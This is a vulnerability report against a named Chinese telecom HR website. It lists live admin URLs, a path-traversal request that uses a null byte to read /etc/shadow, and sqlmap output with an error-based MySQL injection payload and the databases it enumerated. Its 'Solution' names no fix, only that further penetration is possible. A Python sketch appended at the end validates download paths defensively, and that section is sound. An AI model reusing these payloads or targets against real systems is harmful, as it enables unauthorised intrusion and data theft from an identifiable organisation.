SQL Injection + File Inclusion Vulnerability in a website of China Telecom
Back end 1: http://rs.hntelecom.net.cn/HRSystem/initIndex.do
Back end 2: http://rs.hntelecom.net.cn/loginadmin.do?M=login
Vulnerability Type 1:
File inclusion: rs.hntelecom.net.cn/filedown.do?M=filedown&path=/../..//../..//../..//../..//../..//etc/shadow%00
No root permission.
Vulnerability Type 2:
Address: rs.hntelecom.net.cn/search.do?M=search
Post Data: sss=test&Submit=%cb%d1%20%cb%f7&ttt=test
Address: rs.hntelecom.net.cn/searchD.do?M=searchD
Post Data: sss=test&Submit=%cb%d1%20%cb%f7&ttt=test
In other words, the two addresses implement the same function. Is there any point in creating two addresses?
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: ttt
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: sss=1&Submit=�� ��&ttt=1' AND (SELECT 7373 FROM(SELECT COUNT(*),CONCAT(CHAR(58,114,108,100,58),(SELECT (CASE WHEN (7373=7373) THEN 1 ELSE 0 END)),CHAR(58,111,112,99,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND 'JyFl'='JyFl
---
available databases [4]:
[*] information_schema
[*] manpower
[*] test
[*] yiqilaifinddifferences
Solution:
There is a risk of further penetration.
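
One way to close the filedown.do issue is to validate the path parameter on the server before any file is opened. The sketch below is an added example, not code from the site or the original report; the download root, function names and the two extra sample values are assumptions, and Python is used only because the page shows no server code.

```python
import os
from urllib.parse import unquote_to_bytes

# Hypothetical download root (assumption; the page does not show the real one).
DOWNLOAD_ROOT = "/srv/hr/downloads"

class RejectedPath(ValueError):
    """The requested path must not be served."""

def resolve_download(raw_param, root=DOWNLOAD_ROOT):
    """Map the still percent-encoded 'path' value to a file under root."""
    decoded = unquote_to_bytes(raw_param)
    # %00 decodes to NUL, which truncates the name in C-level file APIs
    # and can cut off a suffix the application appends.
    if b"\x00" in decoded:
        raise RejectedPath("NUL byte in path")
    try:
        name = decoded.decode("utf-8")
    except UnicodeDecodeError:
        raise RejectedPath("path is not valid UTF-8")
    # Always interpret the value relative to root, even with a leading '/'.
    candidate = os.path.join(root, name.lstrip("/"))
    # realpath collapses '..', repeated slashes and symlinks before the check.
    real_root = os.path.realpath(root)
    real_candidate = os.path.realpath(candidate)
    if os.path.commonpath([real_root, real_candidate]) != real_root:
        raise RejectedPath("path escapes download root")
    return real_candidate

def verdict(raw_param, root=DOWNLOAD_ROOT):
    """Return ('serve', path) or ('reject', reason) for one request value."""
    try:
        return ("serve", resolve_download(raw_param, root))
    except RejectedPath as exc:
        return ("reject", str(exc))

# Request values: the first is the one reported on the page, the other two
# are constructed for this example.
SAMPLES = [
    "/../..//../..//../..//../..//../..//etc/shadow%00",
    "/../..//../..//etc/shadow",
    "reports/2013-q1.pdf",
]

if __name__ == "__main__":
    for value in SAMPLES:
        print(value, "->", verdict(value))
```

The containment check runs on the canonical path, so it holds regardless of how many `..` segments or doubled slashes the request carries.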